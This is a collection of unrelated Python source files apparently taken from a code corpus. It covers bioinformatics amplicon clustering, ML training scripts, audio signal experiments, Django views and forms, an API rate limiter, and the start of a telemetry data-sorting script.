ampliconA, ampliconB, differences = line\n if ampliconA in graph:\n graph[ampliconA] += [ampliconB]\n else:\n graph[ampliconA] = [ampliconB]\n return graph\n\n\ndef find_path(graph, start, end, path=[]):\n \"\"\"\n Recursively explore the graph and find all paths connecting two\n amplicons (http://www.python.org/doc/essays/graphs.html). As the\n graph is not complete, some pairs of amplicon cannot be linked.\n \"\"\"\n path = path + [start]\n if start == end:\n return path\n if start not in graph:\n return None\n for node in graph[start]:\n if node not in path:\n newpath = find_path(graph, node, end, path)\n if newpath:\n return newpath\n return None\n\n\ndef graph_breaker(amplicons, graph, all_amplicons, ABUNDANT):\n \"\"\"\n Find deep valleys and cut the graph\n \"\"\"\n # High peaks to test (starting and ending points)\n top_amplicons = [amplicon[0] for amplicon in amplicons\n if amplicon[1] >= ABUNDANT]\n # Ending peak is RATIO times higher than the valley\n RATIO = 50\n # Debugging\n print(\"## OTU \", top_amplicons[0], \"\\n\", \"# List potential bridges\",\n sep=\"\", file=sys.stderr)\n # Initialize the list of new seeds\n new_swarm_seeds = [top_amplicons[0]]\n # Break if there is no second peak\n if len(top_amplicons) < 2:\n return new_swarm_seeds, graph\n # Loop over the list of top amplicons\n pairs_of_peaks = itertools.combinations(top_amplicons, 2)\n for pair_of_peaks in pairs_of_peaks:\n start_amplicon, end_amplicon = pair_of_peaks\n path = find_path(graph, start_amplicon, end_amplicon)\n # Path can be empty if the relation have been deleted\n if path and len(path) > 1:\n abundances = [int(all_amplicons[node][0]) for node in path]\n # Find the weakest spot\n lowest = min(abundances)\n if lowest != abundances[-1]:\n # LOW VALLEY MODEL (CHANGE HERE)\n if (abundances[-1] / lowest > RATIO / 2 and abundances[0] / abundances[-1] < 10) or abundances[-1] / lowest >= RATIO:\n # Debugging\n print(abundances, \"\\tBREAK!\", file=sys.stderr)\n # Find the rightmost occurence of the lowest point\n index = len(abundances) - (abundances[::-1].index(lowest) + 1)\n left_amplicon = path[index-1]\n right_amplicon = path[index]\n # Delete the relation from the graph\n graph[left_amplicon].remove(right_amplicon)\n # Remove the graph entry if the relation is now empty\n if not graph[left_amplicon]:\n del graph[left_amplicon]\n # Lowest point will be a new swarm seed\n new_swarm_seeds.append(right_amplicon)\n else:\n print(abundances, file=sys.stderr)\n return new_swarm_seeds, graph\n\n\ndef swarmer(graph, seed, path=[]):\n \"\"\"\n Recursively explore the graph and find all amplicons linked to the\n seed\n \"\"\"\n path = path + [seed]\n if seed in graph:\n for node in graph[seed]:\n path = swarmer(graph, node, path)\n return path\n\n\ndef swarm_breaker(binary, all_amplicons, swarms, threshold):\n \"\"\"\n Recursively inspect and break the newly produced swarms\n \"\"\"\n # ARBITRARY PARAMETERS\n ABUNDANT = 100\n # Deal with each swarm\n for swarm in swarms:\n top_amplicon, swarm_mass, swarm_size, top_abundance, amplicons = swarm\n if swarm_size > 2 and top_abundance > ABUNDANT:\n # Run swarm to get the pairwise relationships\n graph_raw_data = run_swarm(binary, all_amplicons, amplicons, threshold)\n # Build the graph of pairwise relationships\n graph = build_graph(graph_raw_data)\n new_swarm_seeds, graph = graph_breaker(amplicons, graph,\n all_amplicons, ABUNDANT)\n # Explore the graph and find all amplicons linked to the seeds\n observed = 0\n new_swarms = list()\n for seed in new_swarm_seeds:\n new_swarm = swarmer(graph, seed)\n observed += len(new_swarm)\n # Give to the new swarms the same structure and\n # re-order them by decreasing abundance\n amplicons = [(amplicon, all_amplicons[amplicon][0])\n for amplicon in new_swarm]\n amplicons.sort(key=itemgetter(1), reverse=True)\n top_amplicon, top_abundance = amplicons[0]\n swarm_size = len(amplicons)\n swarm_mass = sum([amplicon[1] for amplicon in amplicons])\n new_swarms.append([top_amplicon, swarm_mass,\n swarm_size, top_abundance, amplicons])\n # Deal with the new swarms (no need to treat again the\n # first swarm). There will always be at least one swarm in\n # new_swarms.\n print(\" \".join([\"_\".join([amplicon[0], str(amplicon[1])])\n for amplicon in new_swarms[0][4]]), file=sys.stdout)\n new_swarms.pop(0)\n if new_swarms:\n # Sort the rest of the new swarms by decreasing mass\n # and size. Inject them into swarm_breaker.\n new_swarms.sort(key=itemgetter(1, 2), reverse=True)\n swarm_breaker(binary, all_amplicons, new_swarms, threshold)\n else:\n # Output the swarm\n print(\" \".join([\"_\".join([amplicon[0], str(amplicon[1])])\n for amplicon in amplicons]), file=sys.stdout)\n return None\n\n\ndef main():\n \"\"\"\n Hypothesis: chain of amplicons happen among the most abundant\n amplicons of the swarm. The number of chains in a swarm is\n small. The abundances of each sub-swarm centroids are\n comparable. The \"valleys\" are deep compared to the \"peaks\". Swarm\n graphs are acyclical, so there is only one path joining two\n amplicons.\n\n Synopsis: Break bridges as you discover them. Find the weakest\n point in the chain, break on the left of that point and mark it as\n the seed of a new swarm. Repeat the process with the nth most\n abundant amplicon, until all amplicons in the arbitrary range have\n been treated.\n \"\"\"\n # Parse command line options.\n binary, fasta_file, swarm_file, threshold = option_parse()\n # Load all amplicon ids, abundances and sequences\n all_amplicons = fasta_parse(fasta_file)\n # Load the swarming data\n swarms = swarm_parse(swarm_file)\n # Deal with each swarm\n swarm_breaker(binary, all_amplicons, swarms, threshold)\n\n\n#*****************************************************************************#\n# #\n# Body #\n# #\n#*****************************************************************************#\n\nif __name__ == '__main__':\n\n main()\n\nsys.exit(0)\n","sub_path":"scripts/swarm_breaker.py","file_name":"swarm_breaker.py","file_ext":"py","file_size_in_byte":13168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"279038949","text":"'''\n 1010. 접두 소수\n\n 숫자 \"2333\"의 경우 접두 숫자인 \"2\", \"23\", \"233\", \"2333\" 이 모두 소수입니다.\n 길이 n이 주어졌을 때 길이 n에 해당하는 모든 접두 소수를 출력해주세요.\n'''\n\nimport math\ndef isPrime(num):\n state = True\n for i in range(2, int(math.sqrt(num))+1):\n if num % i == 0:\n state = False\n\n return state\n\nnum = 6\nif isPrime(num):\n print('True')\nelse:\n print('False')","sub_path":"coding practice/Judge/1010.py","file_name":"1010.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"354306113","text":"# ../ImageClassifier/flowers\n\n__author__ = \"Chris\"\n\nimport argparse\n\nimport numpy as np\nimport torch\nfrom torch import nn, optim\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms, models\n\nfrom utilities import pipeline\nfrom functions import build_classifier, train_model, save_model\n\n# Create parser object and tell it what arguments to expect\nparser = argparse.ArgumentParser(description='NN Trainer')\n# ../ImageClassifier/flowers\n# Specify argument for the training data directory\nparser.add_argument('train_data_dir',\n action='store',\n help='Training data path')\n# Specify argument for pretrained neural network\nparser.add_argument('--arch',\n action='store',\n dest='pretrained_model',\n default='vgg11',\n help = 'Pretrained model to implement; defaults to VGG-11; \\\n can work with VGG and Densenet architectures')\n# Specify argument to store model checkpoint\nparser.add_argument('--save_dir',\n action='store',\n dest='save_dir',\n default='checkpoint.pth',\n help='Location to save the model checkpoint')\n# Specify argument for the learning rate\nparser.add_argument('--learn_rate',\n action='store',\n dest='lr',\n type=float,\n default=0.03,\n help='Learning rate for the training model; default 0.03; \\\n float type')\n# Specify argument for the dropout probability\nparser.add_argument('--dropout',\n action='store',\n dest='drop_out',\n type=float,\n default=0.02,\n help='Dropout for training model; default 0.02; \\\n float type')\n# Specify argument for the number of hiden units\nparser.add_argument('--hidden_units',\n action='store',\n dest='hidden_units',\n type=int,\n default=500,\n help='Number of hidden classifier units; default 500; \\\n int type')\n# Specify argument for the number of classes to categorize\nparser.add_argument('--classes',\n action='store',\n dest='classes',\n type=int,\n default=102,\n help='Number of classes to categorize; default 102; \\\n int type')\n# Specify argument for the number of epochs\nparser.add_argument('--epochs',\n action='store',\n dest='epochs',\n type=int,\n default=1,\n help='Number of training epochs; default 1; \\\n int type')\n# Specify argument for GPU mode\nparser.add_argument('--gpu',\n action='store_true',\n default=False,\n help='Turn GPU mode on; default False; \\\n bool type')\n# Assign arguments\nresults = parser.parse_args()\ndata_dir = results.train_data_dir\nsave_dir = results.save_dir\nlearning_rate = results.lr\ndropout = results.drop_out\nhidden_units = results.hidden_units\nclasses = results.classes\nepochs = results.epochs\ngpu = results.gpu\n## Completion of argument assignment ##\n\n## Define data and model specifics\n\n# Data pipeline\ntrain_loader, valid_loader, test_loader, train_data, valid_data, test_data = pipeline(data_dir)\n# Load model\n# Returns the value of the named attribute of an object\npre_trained_model = results.pretrained_model\nmodel = getattr(models, pre_trained_model)(pretrained=True)\n\n# Build and attach a new classifier\ninput_units = model.classifier[0].in_features\nbuild_classifier(model, input_units, hidden_units, classes, dropout)\ncriterion = nn.NLLLoss()\noptimizer = optim.Adam(model.classifier.parameters(), learning_rate)\n\n# Train the model\nmodel, optimizer = train_model(model,epochs,train_loader,valid_loader,criterion,optimizer,gpu)\n\n# Test the model\ntest_model(model,test_loader,gpu)\n# Save the model\nsave_model(loaded_model,train_data,optimizer,save_dir,epochs)\n","sub_path":"Udacity/IntroductionToMachineLearningProgram/Part3_DeepLearning/Deep Learning With Pytorch/Project/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"380787726","text":"import cv2\nimport scipy.io.wavfile\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport math\nfrom scipy.fftpack import fft\n\nrate,data=scipy.io.wavfile.read('project.wav')\n\n#resize\nscaledwav=cv2.resize(data,None,fx=1,fy=0.5)\nscaledwav = np.asarray(scaledwav, dtype=np.int16)\nscipy.io.wavfile.write('./music/resize05.wav',rate,scaledwav)\nscaledwav=cv2.resize(data,None,fx=1,fy=1.5)\nscaledwav = np.asarray(scaledwav, dtype=np.int16)\nscipy.io.wavfile.write('./music/resize15.wav',rate,scaledwav)\n#resize\n\n#gaussian noise\nstd=np.std(data)\nmean=np.mean(data)\nnoise = np.random.normal(mean*0.001,std,data.size)\nnoise=noise.reshape(int(data.size/2),2)\nnoised=np.add(data,noise)\nnoised = np.asarray(noised, dtype=np.int16)\nscipy.io.wavfile.write('./music/noise.wav',rate,noised)\n#gaussian noise\n\n#gaussian blur\nblurO = cv2.GaussianBlur(data, (55,55), 0)\nscipy.io.wavfile.write('./music/blurO.wav',rate,blurO)\nblur2 = cv2.GaussianBlur(noised, (105,105), 0)\nscipy.io.wavfile.write('./music/blur2.wav',rate,blur2)\nblur1 = cv2.GaussianBlur(noised, (55,55), 0)\nscipy.io.wavfile.write('./music/blur1.wav',rate,blur1)\nblur = cv2.GaussianBlur(noised, (25,25), 0)\nscipy.io.wavfile.write('./music/blur.wav',rate,blur)\ndur=data[:,0].size/44100\nx=np.linspace(0,6,dur*44100) \nplt.subplot(621)\nplt.plot(x,data[:,0])\nplt.title('Original wave')\nplt.subplot(622)\nplt.plot(x,blurO[:,0])\nplt.title('Blur Original wave')\nplt.subplot(623)\nplt.plot(x,noised[:,0])\nplt.title('Noise wave')\nplt.subplot(624)\nplt.plot(x,blur[:,0])\nplt.title('Blur Noise size small wave')\nplt.subplot(625)\nplt.plot(x,blur1[:,0])\nplt.title('Blur Noise size mid wave')\nplt.subplot(626)\nplt.plot(x,blur2[:,0])\nplt.title('Blur Noise size large wave')\n#plt.show()\nimg = cv2.imread('openingtest.jpg')\ntestblur = cv2.GaussianBlur(img, (15,15), 0)\ncv2.imwrite('gblur.jpg', testblur)\n#gaussian blur\n\n#opening,dilation,erosion\nkernel = np.ones((3,3),np.int16)\nerosion = cv2.erode(noised,kernel,iterations = 1)\nscipy.io.wavfile.write('./music/erosion.wav',rate,erosion)\ndilation = cv2.dilate(noised,kernel,iterations = 1)\nscipy.io.wavfile.write('./music/dilation.wav',rate,dilation)\nopening = cv2.morphologyEx(noised, cv2.MORPH_OPEN, kernel)\nscipy.io.wavfile.write('./music/opening.wav',rate,opening)\nkernel = np.ones((5,5),np.uint8)\nimg = cv2.imread('openingtest.jpg')\nopening = cv2.morphologyEx(img, cv2.MORPH_OPEN, kernel)\ncv2.imwrite('opening.jpg', opening)\n#opening,dilation,erosion\n\n#sharpen\nrate,data=scipy.io.wavfile.read('project.wav')\nkernel_sharpen = np.array([[-1,-1,-1], [-1,9,-1], [-1,-1,-1]])\noutput = cv2.filter2D(data, -1, kernel_sharpen)\nscipy.io.wavfile.write('./music/sharpen.wav',rate,output)\nplt.subplot(211)\nplt.plot(x,data[:,0])\nplt.title('Original')\nplt.subplot(212)\nplt.plot(x,output[:,0])\nplt.title('Sharpen')\n#plt.show()\n#sharpen\n\n#contrast dark bright\ncontrast25 = cv2.addWeighted(data, 2.5, np.zeros(data.shape, data.dtype), 0, 0)\nscipy.io.wavfile.write('./music/contrast25.wav',rate,contrast25)\ncontrast01 = cv2.addWeighted(data, 0.1, np.zeros(data.shape, data.dtype), 0, 0)\nscipy.io.wavfile.write('./music/contrast01.wav',rate,contrast01)\nbright=np.add(data,np.ones(data.shape, data.dtype)*5000)\nscipy.io.wavfile.write('./music/bright.wav',rate,bright)\ndark=np.add(data,np.ones(data.shape, data.dtype)*-5000)\nscipy.io.wavfile.write('./music/dark.wav',rate,dark)\n#contrast dark bright\n\n#mix channel\neasonrate,eason=scipy.io.wavfile.read('1channelmusic.wav')\nmix=[]\na=eason.shape\nfor i in range(a[0]):\n mix.append(int((eason[i][0]+eason[i][1])/2))\nmix=np.array(mix)\nmix = np.asarray(mix, dtype=np.int16)\nscipy.io.wavfile.write('./music/mix.wav',easonrate,mix)\ndureason=eason[:,0].size/44100\nx=np.linspace(0,12,dureason*44100) \nplt.subplot(311)\nplt.plot(x,eason[:,0])\nplt.title('Left')\nplt.subplot(312)\nplt.plot(x,eason[:,1])\nplt.title('Right')\nplt.subplot(313)\nplt.plot(x,mix[:])\nplt.title('Mix')\n#plt.show()\n#mix channel\n\n# warping\nrate,data=scipy.io.wavfile.read('project.wav')\noutput = np.zeros(data.shape, dtype=data.dtype)\nrows, cols = data.shape\nfor i in range(rows):\n for j in range(cols):\n offset_x = int(20.0 * math.sin(2 * 3.14 * i / 150))\n offset_y = int(20.0 * math.cos(2 * 3.14 * j / 150))\n if i+offset_y < rows and j+offset_x < cols:\n output[i,j] = data[(i+offset_y)%rows,(j+offset_x)%cols]\n else:\n output[i,j] = 0\nscipy.io.wavfile.write('./music/warping.wav',rate,output)\n# warping","sub_path":"project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":4428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"594262693","text":"data=[34,56,67,78,89,-67,100]\r\n\r\n# def fct(a):\r\n# return a**3\r\n\r\nresult=list(map(lambda a: a**3, data))\r\n\r\nprint(result)\r\n\r\ntext=\"34;45;67;78;89\"\r\nresult=text.split(\";\")\r\nprint(result)\r\nresult=list(map(int, result))\r\nprint(result)\r\n\r\ndata=[34,56,-67,-78,89,-67,100]\r\n\r\n# def isPos(a):\r\n# return a > 0\r\n\r\nresult=list(filter(lambda a: a>0, data))\r\nprint(result)\r\n\r\n# def isEven(a):\r\n# return a % 2 == 0\r\n\r\nresult=list(filter(lambda a: a%2 == 0, data))\r\nprint(result)\r\n\r\nimport functools\r\n\r\ndata=[34,56,-67,-78,89,-67,100]\r\n\r\n# def add(a, b):\r\n# return a+b\r\n\r\nresult=functools.reduce(lambda a,b: a+b, data)\r\nprint(result)","sub_path":"lambda2.py","file_name":"lambda2.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"147697955","text":"import numpy as np\nimport pandas as pd\nimport statsmodels.api as sm\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set()\n\nraw_data = pd.read_csv('1.03.+Dummies.csv')\ndata = raw_data.copy()\ndata['Attendance'] = data['Attendance'].map({'Yes':1, 'No':0})\n\n# ? Here the regression begins:\ny = data['GPA'] # ! Selecting GPA as the dependent variable\nx1 = data[['SAT','Attendance']] # ! Selecting SAT and Attendance as independent variables\n\nx = sm.add_constant(x1)\nresult = sm.OLS(y,x).fit()\nresult.summary()\n\n# ? Plotting the regression\nplt.scatter(data['SAT'], y)\nyhat_no = 0.6439 + 0.0014*data['SAT']\nyhat_yes = 0.8665 + 0.0014*data['SAT']\nfig = plt.plot(data['SAT'], yhat_no, lw=2, c=\"#006837\")\nfig = plt.plot(data['SAT'], yhat_yes, lw=2, c=\"#a50026\")\nplt.xlabel('SAT', fontsize =20)\nplt.ylabel('GPA', fontsize = 20)\nplt.show()\n\n# ! The SAT of the student which attended to more than 75% of the classes were 0.2226 higher than\n#! the gpa of students which not attended.\n\n# ? Creating a data frame base on two students SAT scores;\nnew_data = pd.DataFrame({'const':1, 'SAT':[1700,1670], 'Attendance':[0,1]})\nnew_data = new_data[['const', 'SAT', 'Attendance']]\n\n#! Creating predictions about the students;\npredictions = result.predict(new_data)\n\n#! Creating another data frame;\npredictionsdf = pd.DataFrame({'Predictions':predictions})\njoined = new_data.join(predictionsdf)\njoined.rename(index={0:'Bob', 1:'Alice'})\n","sub_path":"dummy_variable/dummy.py","file_name":"dummy.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"310425889","text":"import math\nimport torch\nimport torch.nn as nn\nimport torch.utils\nimport torch.utils.data\nfrom torchvision import datasets, transforms\nfrom torch.autograd import Variable\nimport matplotlib.pyplot as plt \nfrom model import VRNN\n\n\nimport torch.distributions.normal as Norm\nimport torch.distributions.kl as KL\nimport torch.nn.functional as F\n\n\"\"\"implementation of the Variational Recurrent\nNeural Network (VRNN) from https://arxiv.org/abs/1506.02216\nusing unimodal isotropic gaussian distributions for \ninference, prior, and generating models.\"\"\"\n\n\ndef loss_funct(out, x):\n\tprior_mu, prior_sig, decoder_mu, decoder_sig, x_decoded = out\n\tloss = 0.\n\tfor i in range(x.shape[1]):\n\n\t\t#KL div\n\t\ta = Norm.Normal(prior_mu[i], prior_sig[i])\n\t\tb = Norm.Normal(decoder_mu[i], decoder_sig[i])\n\t\tkl_div = torch.mean(KL.kl_divergence(a, b))\n\n\t\tcrossent = torch.mean(F.binary_cross_entropy(x_decoded[i], x[:,i,:], reduction = 'none'))\n\t\tloss += crossent + kl_div\n\n\treturn loss\n\n\n\ndef train(loader, model, optimizer, epochs=100):\n\tdevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\tmodel.to(device)\n\tfor epoch in range(epochs):\n\t\ttrain_loss = 0\n\t\tfor batch_idx, (data, target) in enumerate(loader):\n\n\t\t\tdata = data.squeeze(1)\n\t\t\tdata = (data/255).to(device)\n\t\t\touts = model(data)\n\t\t\tloss = loss_funct(outs, data)\n\t\t\tmodel.zero_grad()\n\t\t\tloss.backward()\n\t\t\t_ = torch.nn.utils.clip_grad_norm_(model.parameters(), 5)\n\t\t\toptimizer.step()\n\t\t\tprint(loss)\n\n\n#hyperparameters\nx_dim = 28\nh_dim = 100\nz_dim = 16\nn_epochs = 100\nclip = 10\nlearning_rate = 1e-3\nbatch_size = 512\nseed = 128\nprint_every = 100\nsave_every = 10\n\n#manual seed\ntorch.manual_seed(seed)\nplt.ion()\n\n#init model + optimizer + datasets\ntrain_loader = torch.utils.data.DataLoader(datasets.MNIST('data',\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t train=True,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t download=True,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t transform=transforms.ToTensor()),\n\t\t\t\t\t\t\t\t\t\t batch_size=batch_size, shuffle=True)\n\ntest_loader = torch.utils.data.DataLoader(datasets.MNIST('data',\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t train=False,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t transform=transforms.ToTensor()),\n\t\t\t\t\t\t\t\t\t\t batch_size=batch_size, shuffle=True)\n\nmodel = VRNN(x_dim, h_dim, z_dim)\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n\n\n#training + testing\ntrain(train_loader, model, optimizer)\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"456946632","text":"f_names = open(\"usns_and_names_dictionary.txt\")\nx = f_names.read()\nx = eval(x)\nresults_list = []\nf_results = open(\"esa_results_cs_1st_year_physics_cycle.csv\")\nfor asj in f_results:\n\tbreak\nfor line in f_results:\n\ttry:\n\t\tl = line.split(\",\")\n\t\tlength = len(l)\n\t\tusn = l[0]\n\t\tresults_list.append(list((l[-1].strip(),x[usn])))\n\texcept Exception as e:\n\t\tasdfghjk = 123456789\n\nresults_list1 = results_list[:]\nresults_list1.sort(reverse = True)\nc = 1\ntotal = len(results_list1)\n\nfor i in results_list1:\n\tif \"NOT FOUND\" in i:\n\t\ttotal -= 1\n\n\n\nprint(\"RANK (/\"+str(total)+\"), NAME , SGPA\")\nfor i in results_list1:\n\tif \"NOT FOUND\" not in i:\n\t\tprint(c,\", \",i[1],\", \",i[0])\n\t\tc += 1\n\nf_results.close()\nf_names.close()\n","sub_path":"esa_results/cs_branch_ranks.py","file_name":"cs_branch_ranks.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"226647872","text":"import datetime\nfrom django import forms\nfrom deliverycenters.cache import get_center_cache\nfrom dvutils.widgets import Html5DateInput\nfrom lm_store.app_settings import DOWNLOAD_PERMISSION_MAP\nfrom lm_store.app_settings import UPLOAD_PERMISSION_MAP\n\n\nclass LmStoreBaseForm(forms.Form):\n \"\"\"Storage format is 'Bucket_name/type/identifier/date/file.ext'\n Type - upload category(rto, dto, pod)\n center - can be stored as cn, zn, region, user\n date = upload date\n \"\"\"\n def __init__(self, user, *args, **kwargs):\n super(LmStoreBaseForm, self).__init__(*args, **kwargs)\n self.fields['date'].initial =\\\n datetime.date.today().strftime('%Y-%m-%d')\n\n category = forms.ChoiceField(required=True, initial='')\n date = forms.DateTimeField(label='Dated',\n widget=Html5DateInput())\n identifier = forms.ChoiceField(required=True, initial='')\n tracking_number = forms.CharField(label=\"Track#\", required=False)\n\n\ndef get_lmstore_upload_type(user):\n type_list = []\n for k, v in UPLOAD_PERMISSION_MAP.items():\n if user.has_perm(\"backend.%s\" % (v[0])):\n type_list.append((k, k))\n return type_list\n\n\nclass LmStoreUploadForm(LmStoreBaseForm):\n def __init__(self, user, *args, **kwargs):\n \"\"\"renaming category to type and\n identifier as center, making date mandatory,\n providing choices in type, center \"\"\"\n super(LmStoreUploadForm, self).__init__(user, *args, **kwargs)\n CENTER_OPTIONS = get_center_cache('code_name')\n self.fields['date'].required = True\n self.fields['identifier'].label = 'Center'\n self.fields['category'].label = 'Type'\n self.fields['identifier'].choices = [\n ('', 'Select center')] + CENTER_OPTIONS\n self.fields['category'].choices = [('', 'Select type')] + \\\n get_lmstore_upload_type(user)\n self.fields[\"tracking_number\"].required = True\n\n file = forms.FileField(required=True)\n\n\ndef get_lmstore_download_type(user):\n type_list = []\n for k, v in DOWNLOAD_PERMISSION_MAP.items():\n if user.has_perm(\"backend.%s\" % (v[0])):\n type_list.append((k, k))\n return type_list\n\n\nclass LmStoreListForm(LmStoreBaseForm):\n def __init__(self, user, *args, **kwargs):\n \"\"\"renaming category to type and\n identifier as center, making date mandatory,\n providing choices in type, center \"\"\"\n super(LmStoreListForm, self).__init__(user, *args, **kwargs)\n CENTER_OPTIONS = get_center_cache('code_name')\n self.fields['identifier'].label = 'Center'\n self.fields['category'].label = 'Type'\n self.fields['identifier'].choices = [\n ('', 'Select center')] + CENTER_OPTIONS\n self.fields['category'].choices = [('', 'Select type')] + \\\n get_lmstore_download_type(user)\n","sub_path":"lm_store/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"527524576","text":"import asyncio\nimport time\n\n\nclass BungieRateLimiter:\n \"\"\"\n Gives out x tokens for network operations every y seconds\n Adapted from https://gist.github.com/pquentin/5d8f5408cdad73e589d85ba509091741\n \"\"\"\n\n RATE = 20 # how many requests per second - bungie allows 20/s\n MAX_TOKENS = 240 # how many requests can we save up - bungie limits after 250 in 10s, so will put that to 240\n\n def __init__(self):\n self.tokens = self.MAX_TOKENS\n self.updated_at = time.monotonic()\n\n async def wait_for_token(self):\n \"\"\"waits until a token becomes available\"\"\"\n while self.tokens < 1:\n self.add_new_tokens()\n await asyncio.sleep(0.1)\n assert self.tokens >= 1\n self.tokens -= 1\n\n def add_new_tokens(self):\n \"\"\"Adds a new token if eligible\"\"\"\n now = time.monotonic()\n time_since_update = now - self.updated_at\n new_tokens = time_since_update * self.RATE\n if self.tokens + new_tokens >= 1:\n self.tokens = min(self.tokens + new_tokens, self.MAX_TOKENS)\n self.updated_at = now\n","sub_path":"ElevatorBot/networking/bungieRatelimiting.py","file_name":"bungieRatelimiting.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"629132000","text":"import inspect\n\n\nclass NotApplicableError(Exception):\n \"\"\"Raised when a method of a class instance is called but when such class should not call the method\"\"\"\n\n def __init__(self, *args):\n if len(args) == 0:\n stack = inspect.stack()[1]\n _class = stack.frame.f_locals['self'].__class__.__name__\n _method = stack.function\n args = [f\"'{_method}' is not defined for {_class}\"]\n\n super(NotApplicableError, self).__init__(*args)\n","sub_path":"copulae/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"425354780","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.db.models.functions import TruncMonth\nfrom django.contrib.auth.decorators import login_required\nfrom django.db.models import Sum\nfrom .forms import *\nfrom .models import *\nfrom .filters import *\nfrom .utils import *\nimport datetime\n\n\n@login_required\ndef parentdashboard(request):\n parent = Parents.objects.get(id=request.user.username)\n child = Students.objects.filter(parent_id=parent.id)\n ord = StudentBill.objects.filter(parent_id=parent.id).order_by('-id')\n children = child.count()\n fees = ord.aggregate(cc=Sum('amount'))\n fees_paid = ord.aggregate(ff=Sum('amount_paid'))\n \n if fees['cc'] and not fees_paid['ff']:\n current_bill = fees['cc']\n elif not fees['cc'] and fees_paid['ff']:\n current_bill= fees_paid['ff']\n elif not fees['cc'] and not fees_paid['ff']:\n current_bill = 0.00\n else:\n current_bill = fees['cc']-fees_paid['ff']\n\n context={\n 'parent':parent,\n 'ord': ord,\n 'children': children,\n 'fees':fees,\n 'fees_paid': fees_paid,\n 'current_bill': current_bill,\n 'child': child,\n }\n \n template ='hod_template/parentdashboard.html'\n return render(request,template,context)\n\n\n@login_required\ndef parentbill(request,pk):\n # studbill = StudentBill.objects.get(id=pk)\n stud = Students.objects.get(id=pk)\n # bb = Bills.objects.get(id=stud.course)\n bill = Bills.objects.filter(\n class_id=stud.course_id)\n \n context = {\n 'bill': bill,\n # 'arres': arres,\n # 'studbill': studbill,\n }\n \n template='hod_template/manage_bill.html'\n return render(request,template)\n\n\n@login_required\ndef child_results(request):\n attendance_list = studenthistory.objects.filter(\n parent_id=request.user.username).order_by('-results')\n context = {\n 'academic_term': attendance_list,\n }\n\n template = 'staff_template/manage_resultss.html'\n return render(request, template, context)\n","sub_path":"school/parent.py","file_name":"parent.py","file_ext":"py","file_size_in_byte":2119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"175724469","text":"#!/usr/bin/env /data/mta/Script/Python3.6/envs/ska3/bin/python\n\n#######################################################################################\n# #\n# gratgen_categorize_data.py: separate gratgen data into different categories #\n# #\n# author: t. isobe (tisobe@cfa.harvard.edu) #\n# #\n# last update: May 20, 2019 #\n# #\n#######################################################################################\n\nimport sys\nimport os\nimport string\nimport re\nimport getpass\nimport fnmatch\nimport numpy\nimport getopt\nimport os.path\nimport time\nimport astropy.io.fits as pyfits\nimport Ska.engarchive.fetch as fetch\nimport Chandra.Time\nimport random\npath = '/data/mta/Script/MTA_limit_trends/Scripts/house_keeping/dir_list'\n\nwith open(path, 'r') as f:\n data = [line.strip() for line in f.readlines()]\n\nfor ent in data:\n atemp = re.split(':', ent)\n var = atemp[1].strip()\n line = atemp[0].strip()\n exec(\"%s = %s\" %(var, line))\n\nsys.path.append(mta_dir)\nsys.path.append(bin_dir)\n\nimport mta_common_functions as mcf #---- mta common functions\nimport envelope_common_function as ecf #---- collection of functions used in envelope fitting\nimport update_database_suppl as uds\n#\n#--- set a temporary file name\n#\nrtail = int(time.time() * random.random())\nzspace = '/tmp/zspace' + str(rtail)\n#\n#--- other settings\n#\nna = 'na'\ncname_list = ['retr_hetg', 'retr_letg', 'insr_hetg', 'insr_letg', 'grat_active', 'grat_inactive']\nmsid_list = ['4hposaro', '4hposbro', '4lposaro', '4lposbro',\\\n '4mp28av', '4mp28bv', '4mp5av', '4mp5bv']\n\n#----------------------------------------------------------------------------------------\n#-- gratgen_categorize_data: separate gratgen data into different categories --\n#----------------------------------------------------------------------------------------\n\ndef gratgen_categorize_data():\n \"\"\"\n separate gratgen data into different categories\n input: none but use /Gratgen/*.fits\n output: /Gratgen_/*.fits\n \"\"\"\n#\n#--- get the basic information\n#\n [udict, ddict, mta_db, mta_cross] = ecf.get_basic_info_dict()\n\n for msid in msid_list:\n cols = ['time', msid, 'med', 'std', 'min', 'max', 'ylower',\\\n 'yupper', 'rlower', 